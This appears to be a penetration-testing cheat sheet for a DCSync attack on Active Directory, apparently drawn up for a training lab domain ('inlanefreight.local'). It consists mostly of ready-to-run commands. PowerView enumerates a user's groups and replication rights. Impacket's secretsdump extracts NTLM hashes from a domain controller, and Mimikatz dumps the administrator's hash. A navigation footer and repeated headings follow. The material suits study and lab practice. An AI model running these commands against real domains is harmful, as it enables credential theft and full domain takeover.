DCSync

1. View Group Membership of a Specific User

Command:

Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol | fl

Description: PowerView tool used to view the group membership of a specific user (adunn) in a target Windows domain.

2. Check User's Replication Rights

Command:

$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

Description:
- Creates a variable SID set to the SID of a user account.
- Uses PowerView's Get-ObjectAcl to check the user's replication rights in the target domain.

3. Extract NTLM Hashes from NTDS.dit

Command:

secretsdump.py -outputfile inlanefreight_hashes -justdc INLANEFREIGHT/adunn@172.16.5.5 -use-vss

Description: Impacket tool used to extract NTLM hashes from the NTDS.dit file on a target Domain Controller (172.16.5.5) and save the extracted hashes to a file (inlanefreight_hashes).
- Performed from a Linux-based host.

4. Perform a DCSync Attack Using Mimikatz

Command:

mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

Description: Uses Mimikatz to perform a DCSync attack and retrieve password hashes from a target Windows-based Domain Controller.

PreviousASREPRoasting NextKerberoasting

Last updated 10 months ago

hashtag1. View Group Membership of a Specific User

hashtagCommand:

hashtag2. Check User's Replication Rights

hashtagCommand:

hashtag3. Extract NTLM Hashes from NTDS.dit

hashtagCommand:

hashtag4. Perform a DCSync Attack Using Mimikatz

hashtagCommand:

1. View Group Membership of a Specific User

Command:

2. Check User's Replication Rights

Command:

3. Extract NTLM Hashes from NTDS.dit

Command:

4. Perform a DCSync Attack Using Mimikatz

Command: